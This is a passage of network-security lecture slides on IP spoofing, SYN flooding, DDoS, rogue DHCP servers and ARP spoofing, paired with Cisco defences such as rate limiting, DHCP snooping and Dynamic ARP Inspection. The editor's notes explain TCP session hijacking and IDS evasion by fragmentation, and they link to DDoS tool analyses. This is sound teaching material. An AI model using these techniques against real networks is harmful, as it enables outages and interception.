  • 32. IP Spoofing – IP spoofing occurs when a hacker inside or outside a network impersonates a trusted source. – IP spoofing uses trusted internal IP addresses or trusted external IP addresses. – Attackers use IP spoofing for many reasons: • To gain root access • To inject malicious data or commands into an existing data stream • To divert network packets to the hacker who can then reply as a trusted user by changing the routing tables • To crash servers by overloading memory (DoS) • As a step in a larger attack
  • 33. IP Spoofing—Types of Attack •IP spoofing attacks are either: – Nonblind spoofing • The attacker sniffs sequence numbers (i.e., from inside the subnet of the victim). – Blind spoofing • The attacker calculates sequence numbers. •IP spoofing can lead to these types of attacks: – Man-in-the-middle attack – DoS attack – Distributed DoS (DDoS) attack
  • 34. Let’s see in action
  • 35. Here we drive router to reply to the other host..
  • 36. Man-in-the-Middle Attacks – A man-in-the-middle attack requires that the hacker has access to network packets that come across a network. – A man-in-the-middle attack is implemented using the following: • Network packet sniffers (nonblind attack) • Routing and transport protocols (blind attack) Host A Host B Router A Router B Data in Clear Text
  • 37. IP Spoofing Attack Mitigation • The threat of IP spoofing can be reduced, but not eliminated, using these measures: – Strong access control at the router • ACLs on outbound interface • ACLs on inbound interface – Data encryption – Additional authentication requirements Host A Host B Router A ISP Router B IPSec tunnel
  • 38. DoS Attacks • A DoS attack damages or corrupts your computer system or denies you and others access to your networks, systems, or services. • DoS attack techniques almost always use IP spoofing.
  • 39. TCP SYN Flooding DoS Attack Attacker TCP Client ------------- Client Ports 1024–65535 Victim TCP Server ------------- Service Ports 1–1024 80 1SYN 2 SYN and ACK ? SYN Packet with Spoofed Source Address TCP Client ------------- Client Ports 1024–65535 TCP Server ------------- Service Ports 1–1024 80 1SYN 3ACK 2 SYN and ACK TCP Three- Way Handshake
  • 40. DDoS Attacks • DoS and DDoS attacks have these characteristics: – They are not generally targeted to gain access. – They aim at making a service unavailable. – They require very little effort to execute. – They are difficult to eliminate. • DoS Attack • DDoS Attack Attacker Victim Attack Control Mechanism Zombie Zombie Zombie Victim
  • 41. DDoS Example Handler Systems Client System 4. The client issues commands to handlers that control agents in a mass attack. 1. The cracker looks for targets. 2. The cracker installs software to scan, compromise, and infect agents with zombies. 3. Agents are loaded with remote control attack software. Agent Systems
  • 43. Let’s be more creative…
  • 44. We put almost 1 million packets in one minute period on the wire, not so bad….
  • 46. DoS and DDoS Attack Mitigation • Reduce DoS and DDoS attacks by: – Protecting yourself against IP spoofing with ingress- and egress-filtering ACLs – Using antivirus software to find zombie agents – Using anti-DoS features on routers and firewalls • ip verify unicast reverse-path interface command • ACLs to filter all private Internet address space (RFC 1918) – Using traffic rate limiting at the ISP level • Use class-based traffic policing on ICMP packets • Use SYN rate limiting
  • 47. Rate Limiting What rate limiting does: • Allows network managers to set bandwidth thresholds for users and by traffic type Benefits: • Prevents the deliberate or accidental flooding of the network • Keeps traffic flowing smoothly Rate Limiting for Different Classes of UsersNetwork Manager Teachers Students 2 Mbps 10 Mbps 50 Mbps Otherwise, there can be a deliberate or accidental slowdown or freezing of the network.
  • 48. Example: ICMP rate limiting access-list 170 permit icmp any any Interface f0/0 rate-limit input access-group 170 128000 16000 24000 conform-action transmit exceed-action drop
  • 49. Spoofing the DHCP Server 1. An attacker activates a DHCP server on a network segment. 2. The client broadcasts a request for DHCP configuration information. 3. The rogue DHCP server responds before the legitimate DHCP server can respond, assigning attacker-defined IP configuration information. 4. Host packets are redirected to the attacker address as it emulates a default gateway for the erroneous DHCP address provided to the client. ClientRogue DHCP Attacker Legitimate DHCP Server
  • 50. Everything starts with starvation…
  • 51. Storm Control can be in help… Interface fastethernet 0/1 storm-control broadcast level 10.00 8.00
  • 52. DHCP Snooping – DHCP snooping allows the configuration of ports as trusted or untrusted. • Trusted ports can send DHCP requests and acknowledgements. • Untrusted ports can forward only DHCP requests. – DHCP snooping enables the switch to build a DHCP binding table that maps a client MAC address, IP address, VLAN, and port ID. – Use the ip dhcp snooping command. Client Rogue DHCP Attacker Legitimate DHCP Server
  • 53. DHCP Snooping Configuration ip dhcp snooping ip dhcp snooping vlan 20 interface FastEthernet0/13 switchport access vlan 20 ip dhcp snooping trust Switch#sh ip dhcp snooping binnding MacAddress IpAddress Lease(sec) Type VLAN Interface ------------------ --------------- ---------- ------------- ---- -------------------- 00:14:A8:96:2C:40 10.1.2.12 86371 dhcp-snooping 20 FastEthernet0/24 00:14:6A:1D:B8:00 10.1.2.13 86371 dhcp-snooping 20 FastEthernet0/23 Total number of bindings: 2
  • 54. ARP Spoofing: Man-in-the-Middle Attacks •10.1.1.1 = MAC C.C.C.C ARP Table in Host A IP 10.1.1.2 MAC A.A.A.A A B •10.1.1.2 = MAC C.C.C.C ARP Table in Host B •10.1.1.1 = MAC B.B.B.B •10.1.1.2 = MAC A.A.A.A ARP Table in Host C CIP 10.1.1.3 MAC C.C.C.C 1. IP 10.1.1.2 ? MAC for 10.1.1.1 2. Legitimate ARP reply 10.1.1.1 = MAC B.B.B.B 3. Subsequent gratuitous ARP replies overwrite legitimate replies •10.1.1.1 bound to C.C.C.C •10.1.1.2 bound to C.C.C.C Attacker IP 10.1.1.1 MAC B.B.B.B A B C A = host A B = host B C = host C
  • 55. 10.1.1.1 Mitigating Man-in-the-Middle Attacks with DAI • MAC or IP Tracking Built on DHCP Snooping 10.1.1.2 DHCP Server DHCP Discovery (BCAST) DHCP Offer (UCAST) DAI provides protection against attacks such as ARP poisoning using spoofing tools such as ettercap, dsniff, and arpspoof. DAI Function: Track Discovery Track DHCP Offer MAC or IP Track Subsequent ARPs for MAC or IP
  • 56. DAI in Action •A binding table containing IP-address and MAC-address associations is dynamically populated using DHCP snooping. 10.1.1.1 10.1.1.2 10.1.1.2 GARP is sent to attempt to change the IP address to MAC bindings. Gateway is 10.1.1.1 Attacker is not gateway according to this binding table I am your gateway: 10.1.1.1
  • 57. DAI Configuration… ip arp inspection vlan 20 ip arp inspection vlan 20 logging dhcp-bindings all ip arp inspection validate src-mac
  • 58. Questions & Discussion ? ?? ? ? ? ?? ? ? ? ? ? ?

Editor's Notes

  1. Mstream - http://staff.washington.edu/dittrich/misc/mstream.analysis.txt Stacheldraht - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt Trin00 - http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt TFN - http://staff.washington.edu/dittrich/misc/tfn.analysis.txt
  2. AntiSniff - http://www.securitysoftwaretech.com/antisniff/ Check Promiscuous Mode (CPM) – ftp://ftp.cert.org/pub/tools/cpm IFSTATUS - ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ifstatus/ LiSt Open Files (lsof) - ftp://vic.cc.purdue.edu/pub/tools/unix/lsof Neped - http://www.attrition.org/security/newbie/security/sniffer/neped.c Promisc - http://www.attrition.org/security/newbie/security/sniffer/promisc.c SNORT - http://www.snort.org
  3. AntiSniff - http://www.securitysoftwaretech.com/antisniff/ Check Promiscuous Mode (CPM) – ftp://ftp.cert.org/pub/tools/cpm IFSTATUS - ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ifstatus/ LiSt Open Files (lsof) - ftp://vic.cc.purdue.edu/pub/tools/unix/lsof Neped - http://www.attrition.org/security/newbie/security/sniffer/neped.c Promisc - http://www.attrition.org/security/newbie/security/sniffer/promisc.c SNORT - http://www.snort.org
  4. Mstream - http://staff.washington.edu/dittrich/misc/mstream.analysis.txt Stacheldraht - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt Trin00 - http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt TFN - http://staff.washington.edu/dittrich/misc/tfn.analysis.txt
  5. Mstream - http://staff.washington.edu/dittrich/misc/mstream.analysis.txt Stacheldraht - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt Trin00 - http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt TFN - http://staff.washington.edu/dittrich/misc/tfn.analysis.txt
  6. Windows Domain Models - http://is-it-true.org/nt/atips/atips307.shtml Linux/UNIX Trusts - http://nim.cit.cornell.edu/usr/share/man/info/en_US/a_doc_lib/files/aixfiles/hosts.equiv.htm
  7. Allows traffic entering a compromised machine on a particular port (that is, TCP/22-SSH) to be redirected to a different machine on a different port (TCP/23-Telnet) Allows an attacker to exploit trust relationships to circumvent the firewall for all hosts once he controls one host. Root kit based install allows the redirection process, files, and connections to be hidden.
  8. IP Spoofing – an attacker sends a message to a target host with an IP address indicating that the message is coming from a trusted host. The attacker must know the IP address of a trusted host in order to modify the packet headers so that it appears that the packets are coming from that host. TCP Session Hijacking – an attacker sniffs for packets being sent from a client to a server in order to identify the two hosts&amp;apos; IP addresses and relative port numbers. Using this information an attacker modifies his packet headers to spoof TCP/IP packets from the client. The attacker then waits to receive an ACK packet from the client communicating with the server (which contains the sequence number of the next packet the client is expecting). The attacker replies to the client using a modified packet with the source address of the server and the destination address of the client. This results in a RST which disconnects the legitimate client. The attacker takes over communications with the server spoofing the expected sequence number from the ACK that was previously sent from the legitimate client to the server. IP Fragmentation – Firewalls that support stateful inspection of established connections analyze packets to see if they are being received in the proper sequence. In the case of IP fragments, the firewall attempts to reassemble all fragments prior to forwarding them on to the final destination. If an attacker sends repeated incomplete or out-of-order fragmented packets to the firewall it will log and wait for all remaining fragments to be received before handling the connection. As a result, system resources are exhausted due to logging and the firewall is subject to a denial of service. Also, some Intrusion Detection Systems (IDS) do not handle IP fragmentation, Out-of-Order fragmentation, TCP segment overlap, and Out-of-Order TCP segments properly; which results in packets slipping through because the IDS failed to alarm!!!
  9. Mstream - http://staff.washington.edu/dittrich/misc/mstream.analysis.txt Stacheldraht - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt Trin00 - http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt TFN - http://staff.washington.edu/dittrich/misc/tfn.analysis.txt